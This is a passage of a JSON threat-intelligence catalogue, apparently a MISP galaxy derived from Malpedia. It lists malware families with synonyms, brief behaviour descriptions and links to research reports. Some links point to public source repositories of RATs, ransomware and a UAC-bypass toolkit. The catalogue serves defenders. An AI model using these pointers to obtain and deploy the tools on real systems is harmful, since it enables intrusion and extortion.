
{
"description": "Malware galaxy based on Malpedia archive.",
"type": "malpedia",
"authors": [
"Daniel Plohmann",
"Andrea Garavaglia",
"Davide Arcuri"
],
"values": [
{
"uuid": "9ee0eb87-7648-4581-b301-7472a48946ad",
"value": "reGeorg",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://sensepost.com/discover/tools/reGeorg/",
"https://github.com/sensepost/reGeorg"
]
}
},
{
"uuid": "e6005ce5-3e3d-4dfb-8de7-3da45e89e549",
"value": "Quant Loader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/",
"https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground",
"https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat",
"https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/"
]
}
},
{
"uuid": "abd22cec-49ee-431f-a2e6-e4722b3e44bb",
"value": "Unidentified 049 (Lazarus/RAT)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/"
]
}
},
{
"uuid": "31615066-dbff-4134-b467-d97a337b408b",
"value": "HawkEye Keylogger",
"description": "",
"meta": {
"synonyms": [
"Predator Pain"
],
"type": [],
"refs": [
"https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/",
"https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html",
"http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html",
"https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/"
]
}
},
{
"uuid": "96bb088c-7bb7-4a07-a9d7-a3cbb45d5755",
"value": "Kegotip",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "53e94bc9-c8d2-4fb6-9c02-00841e454050",
"value": "Rover",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/"
]
}
},
{
"uuid": "a6f481fe-b6db-4507-bb3c-28f10d800e2f",
"value": "Loki",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/"
]
}
},
{
"uuid": "2d07a1bf-1d8d-4f1e-a02f-1a8ff5b76cd1",
"value": "Vermin",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/"
]
}
},
{
"uuid": "4d9d0223-32fe-49cf-8608-0e154359528a",
"value": "LokiBot",
"description": "Android banker Trojan with the standard banking capabilities such as overlays, SMS stealing. It also features ransomware functionality. Note, the network traffic is obfuscated the same way as in Android Bankbot.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html"
]
}
},
{
"uuid": "8faf7592-be5c-44af-b1ca-2bd8caec195d",
"value": "Leash",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/"
]
}
},
{
"uuid": "5424d89e-1b7a-4632-987b-67fd27621d6f",
"value": "Unidentified 022 (Ransom)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "bfa75eb1-1d8d-4127-932f-3b7090a242e9",
"value": "Wonknu",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/"
]
}
},
{
"uuid": "df9c8440-b4da-4226-b982-e510d06cf246",
"value": "Unidentified 044",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "6b6cf608-cc2c-40d7-8500-afca3e35e7e4",
"value": "Wipbot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf"
]
}
},
{
"uuid": "2894aee2-e0ec-417a-811e-74a68ab967b2",
"value": "Remcos",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://malware-traffic-analysis.net/2017/12/22/index.html",
"https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2",
"https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/",
"https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/",
"https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/",
"https://secrary.com/ReversingMalware/RemcosRAT/"
]
}
},
{
"uuid": "6fb5bfff-4b10-43a4-ad3c-a1578f39e83e",
"value": "CradleCore",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blogs.forcepoint.com/security-labs/cradlecore-ransomware-source-code-sale"
]
}
},
{
"uuid": "b0467c03-824f-4071-8668-f056110d2a50",
"value": "Taleret",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html",
"http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html"
]
}
},
{
"uuid": "d327b4d9-e1c8-4c71-b9fe-775d1607e7d4",
"value": "SynFlooder",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
]
}
},
{
"uuid": "782bee33-9f8d-41df-a608-c014bd6a7de1",
"value": "Poweliks Dropper",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users"
]
}
},
{
"uuid": "044849d3-d0de-4f78-b67d-bfbe8dd3a255",
"value": "Vflooder",
"description": "Vflooder floods VirusTotal by repeatedly submitting copies of itself. Some variants apparently also try to flood Twitter. The impact on these services is negligible, but for researchers it can be a nuisance. Most versions are protected by VMProtect.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2017/10/analyzing-malware-by-api-calls/"
]
}
},
{
"uuid": "79a7203a-6ea5-4c39-abd4-faa20cf8821a",
"value": "Cerber",
"description": "A prolific ransomware which originally added \".cerber\" as a file extension to encrypted files. Has undergone multiple iterations in which the extension has changed. Uses a very readily identifiable set of UDP activity to check in and report infections. Primarily uses TOR for payment information.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/",
"https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/",
"https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/"
]
}
},
{
"uuid": "a4b9c526-42d0-4de9-ab8e-e78f99655d11",
"value": "SysGet",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/"
]
}
},
{
"uuid": "67fc358f-da6a-4f01-be23-44bc97319127",
"value": "Shim RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf"
]
}
},
{
"uuid": "f7aae3bc-4a46-4334-a28e-35650289dd1a",
"value": "Uroburos",
"description": "",
"meta": {
"synonyms": [
"Snake"
],
"type": [],
"refs": []
}
},
{
"uuid": "80447111-8085-40a4-a052-420926091ac6",
"value": "AndroRAT",
"description": "Androrat is a remote administration tool developed in Java for Android on the client side and in Java/Swing for the server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It was developed by a team of four for a university project. The goal of the application is to give remote control of the Android system and to retrieve information from it.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/DesignativeDave/androrat",
"https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html"
]
}
},
{
"uuid": "cb5bad79-707c-493d-8a2b-4c0be38301c5",
"value": "CodeKey",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf"
]
}
},
{
"uuid": "5a78ec38-8b93-4dde-a99e-0c9b77674838",
"value": "TinyNuke",
"description": "TinyNuke is a fully-fledged banking trojan including a HiddenDesktop/VNC server and a reverse SOCKS4 server. The author destroyed his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on GitHub. XBot is an offspring of TinyNuke and remains very similar to its ancestor.",
"meta": {
"synonyms": [
"Xbot",
"MicroBankingTrojan",
"NukeBot",
"Nuclear Bot"
],
"type": [],
"refs": [
"http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4596",
"https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702",
"https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet",
"https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html",
"https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/",
"https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/",
"https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/"
]
}
},
{
"uuid": "ccde5b0d-fe13-48e6-a6f4-4e434ce29371",
"value": "UACMe",
"description": "A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.",
"meta": {
"synonyms": [
"Akagi"
],
"type": [],
"refs": [
"https://github.com/hfiref0x/UACME"
]
}
},
{
"uuid": "271752e3-67ca-48bc-ade2-30eec11defca",
"value": "RadRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://labs.bitdefender.com/2018/04/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/"
]
}
},
{
"uuid": "212d1ed7-0519-412b-a1ce-56046ca93372",
"value": "SNEEPY",
"description": "",
"meta": {
"synonyms": [
"ByeByeShell"
],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/"
]
}
},
{
"uuid": "d1597713-fe7a-45bd-8b59-1a13c7e097d8",
"value": "Misdat",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf"
]
}
},
{
"uuid": "ac4fbbb0-9a21-49ce-be82-e44cb02a7819",
"value": "DreamBot",
"description": "2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n2014 Dreambot (Gozi ISFB variant)\r\n\r\nIn 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-VM checks (VMware, VirtualBox, QEMU), while the actual bot DLL remains largely unchanged. New functionality such as TOR support was added, though, and the Fluxxy fast-flux network is often used.\r\n\r\nSee win.gozi for additional historical information.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://lokalhost.pl/gozi_tree.txt",
"https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality"
]
}
},
{
"uuid": "838e2a3a-c4cb-4bee-b07f-c97b143c68d6",
"value": "OneKeyLocker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/malwrhunterteam/status/1001461507513880576"
]
}
},
{
"uuid": "2637315d-d31e-4b64-aa4b-2fc265b0a1a3",
"value": "HesperBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "d9e6adf2-4f31-48df-a7ef-cf25d299f68c",
"value": "GlassRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://community.rsa.com/community/products/netwitness/blog/2015/11/25/detecting-glassrat-using-security-analytics-and-ecat"
]
}
},
{
"uuid": "4ec40af9-0295-4b9a-81ad-b7017a21609d",
"value": "BackSwap",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/",
"https://www.cert.pl/en/news/single/backswap-malware-analysis/"
]
}
},
{
"uuid": "ae4aa1ef-4da0-4952-9583-9d47f84edad9",
"value": "CryptoFortress",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/",
"https://www.lexsi.com/securityhub/cryptofortress/?lang=en",
"http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html"
]
}
},
{
"uuid": "3eae1764-7ea6-43e6-85a1-b1dd0b4856b8",
"value": "vSkimmer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.xylibox.com/2013/01/vskimmer.html",
"http://vkremez.weebly.com/cyber-security/-backdoor-win32hesetoxa-vskimmer-pos-malware-analysis",
"https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/"
]
}
},
{
"uuid": "73806c57-cef8-4f7b-a78b-7949ef83b2c2",
"value": "GlobeImposter",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/",
"https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant",
"https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run",
"https://isc.sans.edu/diary/23417",
"https://blog.ensilo.com/globeimposter-ransomware-technical",
"https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet"
]
}
},
{
"uuid": "0e435b5d-37df-47cc-a1c4-1afb82df83d1",
"value": "Unidentified 003",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "70f6c71f-bc0c-4889-86e3-ef04e5b8415b",
"value": "Daserf",
"description": "",
"meta": {
"synonyms": [
"Nioupale",
"Muirim"
],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/",
"https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
"https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/"
]
}
},
{
"uuid": "9de41613-7762-4a88-8e9a-4e621a127f32",
"value": "Morphine",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "c1144eb8-a2bc-48d7-b0fb-18f124c1f8d9",
"value": "MajikPos",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/"
]
}
},
{
"uuid": "5f427b3a-7162-4421-b2cd-e6588d518448",
"value": "ATMitch",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/"
]
}
},
{
"uuid": "e3adbb0d-6d6e-4686-8108-ee76452339bf",
"value": "ScanPOS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos",
"https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware"
]
}
},
{
"uuid": "05252643-093b-4070-b62f-d5836683a9fa",
"value": "Quasar RAT",
"description": "Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/",
"https://github.com/quasar/QuasarRAT/tree/master/Client",
"https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/",
"https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
"https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite",
"https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/",
"https://twitter.com/malwrhunterteam/status/789153556255342596",
"http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments"
]
}
},
{
"uuid": "48cdcbcf-38a8-4c68-a85e-42989ca28861",
"value": "Icefog",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.kz-cert.kz/page/502"
]
}
},
{
"uuid": "d073f9e5-8aa8-4e66-ba47-f332759199a2",
"value": "Unidentified 037",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "1c27b1a3-ea2a-45d2-a982-12e1509aa4ad",
"value": "Glasses",
"description": "",
"meta": {
"synonyms": [
"Wordpress Bruteforcer"
],
"type": [],
"refs": [
"https://forum.exploit.in/pda/index.php/t102378.html"
]
}
},
{
"uuid": "3c74a04d-583e-40ec-b347-bdfeb534c614",
"value": "ZhCat",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
]
}
},
{
"uuid": "4ff34778-de4b-4f48-9184-4975c8ccc3f3",
"value": "Koler",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/LukasStefanko/status/928262059875213312"
]
}
},
{
"uuid": "34c6504b-e947-49d8-a963-62b7594b7ef9",
"value": "Sanny",
"description": "",
"meta": {
"synonyms": [
"Daws"
],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html"
]
}
},
{
"uuid": "6c09cc53-7160-47c6-8df8-3e0d42deb5a6",
"value": "Micrass",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/"
]
}
},
{
"uuid": "a673b4fb-a864-4a5b-94ab-3fc4f5606cc8",
"value": "Yahoyah",
"description": "",
"meta": {
"synonyms": [
"KeyBoy"
],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/"
]
}
},
{
"uuid": "dcd1f76d-5a40-4c58-b01e-a749871fe50b",
"value": "Limitail",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "d3af810f-e657-409c-b821-4b1cf727ad18",
"value": "Bolek",
"description": "",
"meta": {
"synonyms": [
"KBOT"
],
"type": [],
"refs": [
"https://asert.arbornetworks.com/communications-bolek-trojan/",
"http://www.cert.pl/news/11379"
]
}
},
{
"uuid": "9c90b876-e94d-4ea5-9f30-fdc6dd6b5aef",
"value": "Dharma",
"description": "",
"meta": {
"synonyms": [
"Arena",
"Crysis"
],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/"
]
}
},
{
"uuid": "026d638b-cc51-4eff-97fc-d61215a1a70a",
"value": "ModPOS",
"description": "",
"meta": {
"synonyms": [
"straxbot"
],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2015/11/modpos.html",
"https://twitter.com/physicaldrive0/status/670258429202530306"
]
}
},
{
"uuid": "878ab9fc-a526-43bd-81ac-3eba14ba0f1f",
"value": "Unidentified 046",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/DrunkBinary/status/1006534471687004160"
]
}
},
{
"uuid": "40fc6f71-75ac-43ac-abd9-c90b0e847999",
"value": "CreativeUpdater",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/",
"https://objective-see.com/blog/blog_0x29.html",
"https://digitasecurity.com/blog/2018/02/05/creativeupdater/"
]
}
},
{
"uuid": "1de27925-f94c-462d-acb6-f75822e05ec4",
"value": "Gravity RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/",
"https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html"
]
}
},
{
"uuid": "f4cac204-3d3f-4bb6-84bd-fc27b2f5158c",
"value": "SOUNDBITE",
"description": "",
"meta": {
"synonyms": [
"denis"
],
"type": [],
"refs": [
"https://attack.mitre.org/wiki/Software/S0157",
"https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html"
]
}
},
{
"uuid": "827490bf-19b8-4d14-83b3-7da67fbe436c",
"value": "Datper",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/",
"https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
"http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html"
]
}
},
{
"uuid": "e701b875-8ade-434f-89ff-6c367099bfd8",
"value": "FF RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/en_us/blog/breaking-down-ff-rat-malware.html"
]
}
},
{
"uuid": "dcdd98a7-aad2-4a96-a787-9c4665bbb1b8",
"value": "CycBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2011/07/14/cycbot-ready-to-ride/"
]
}
},
{
"uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8",
"value": "pupy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations",
"https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/",
"https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/",
"https://github.com/n1nj4sec/pupy"
]
}
},
{
"uuid": "c1b9e8c5-9283-4dbe-af10-45956a446fb7",
"value": "AlphaLocker",
"description": "AlphaLocker is a form of ransomware built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost: the ransomware can be purchased for just $65 in bitcoin.\r\n\r\nAlphaLocker, also known as Alpha Ransomware, is based on EDA2, an educational ransomware project open-sourced on GitHub by Turkish researcher Utku Sen. A Russian coder appears to have cloned this repository before it was taken down and used it to create a near-perfect clone of EDA2. The ransomware's author is said to pay a great deal of attention to updating the ransomware with new features so that it stays ahead of antivirus engines and evades detection.\r\n\r\nAlphaLocker's encryption process starts when the ransomware contacts its C&C server. The server generates an RSA-2048 key pair, sends the public key to the victim's computer and keeps the private key on the server. On the infected computer, the ransomware generates a per-file AES-256 key, encrypts the file with it, encrypts that AES key with the public RSA key, and sends the wrapped key to the C&C server.\r\n\r\nTo decrypt their files, victims need the private RSA key, which unwraps the per-file AES keys that in turn decrypt the files. Victims have to pay around 0.35 Bitcoin (~$450) to get this key, packaged with a decrypter.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.cylance.com/an-introduction-to-alphalocker"
]
}
},
{
"uuid": "f2b0ffdc-7d4e-4786-8935-e7036faa174d",
"value": "Unidentified 050 (APT32 Profiler)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f",
"https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef"
]
}
},
{
"uuid": "fab34d66-5668-460a-bc0f-250b9417cdbf",
"value": "TURNEDUP",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html"
]
}
},
{
"uuid": "23398248-a52a-4a7c-af10-262822d33a4e",
"value": "backspace",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
]
}
},
{
"uuid": "44168d77-338d-46ad-a5f6-c17c2b6b0631",
"value": "Devil's Rat",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "92d87656-5e5b-410c-bdb6-bf028324dc72",
"value": "RoyalCli",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/nccgroup/Royal_APT",
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
]
}
},
{
"uuid": "bc1fc21d-80c0-4629-bb18-d5ae1df2a431",
"value": "RapidStealer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://pwc.blogs.com/cyber_security_updates/2014/09/malware-microevolution.html"
]
}
},
{
"uuid": "d238262a-4832-408f-9926-a7174e671b50",
"value": "WaterSpout",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html"
]
}
},
{
"uuid": "dd9939a4-df45-4c7c-8a8d-83b40766aacd",
"value": "SuppoBox",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "b96be762-56a0-4407-be04-fcba76c1ff29",
"value": "HiddenTear",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/",
"https://twitter.com/struppigel/status/950787783353884672",
"https://github.com/goliate/hidden-tear"
]
}
},
{
"uuid": "d97ae60e-612a-4feb-908a-8c4d32e9d763",
"value": "Brambul",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.us-cert.gov/ncas/alerts/TA18-149A",
"https://www.us-cert.gov/ncas/analysis-reports/AR18-149A",
"https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/"
]
}
},
{
"uuid": "d31f1c73-d14b-41e2-bb16-81ee1d886e43",
"value": "SHARPKNOT",
"description": "",
"meta": {
"synonyms": [
"Bitrep"
],
"type": [],
"refs": [
"https://eromang.zataz.com/tag/agentbase-exe/",
"https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf"
]
}
},
{
"uuid": "da2969f2-01e9-4ca8-b2f3-5fc9a9891d57",
"value": "StrongPity",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/physicaldrive0/status/786293008278970368",
"https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/",
"https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/",
"https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/"
]
}
},
{
"uuid": "c9d78931-318c-4b34-af33-c90f6612a4f1",
"value": "Furtim",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://sentinelone.com/blogs/sfg-furtims-parent/",
"http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4341&sid=af76b944112a234fa933cc934d21cd9f"
]
}
},
{
"uuid": "add29684-94b7-4c75-a43b-d039c4b76158",
"value": "pgift",
"description": "Information gathering and downloading tool used to deliver second stage malware to the infected system",
"meta": {
"synonyms": [
"ReRol"
],
"type": [],
"refs": [
"https://community.fireeye.com/external/1093"
]
}
},
{
"uuid": "e8240391-3e3d-4894-ba80-f8e8de8a8222",
"value": "QtBot",
"description": "",
"meta": {
"synonyms": [
"qtproject"
],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/"
]
}
},
{
"uuid": "2b71a966-da08-4467-a785-cb6abf2fa65e",
"value": "Combos",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "ad5bcaef-1a86-4cc7-8f2e-32306b995018",
"value": "Sinowal",
"description": "",
"meta": {
"synonyms": [
"Quarian",
"Mebroot",
"Anserin",
"Theola"
],
"type": [],
"refs": [
"https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2",
"https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/",
"https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan"
]
}
},
{
"uuid": "8410d208-7450-407d-b56c-e5c1ced19632",
"value": "gsecdump",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
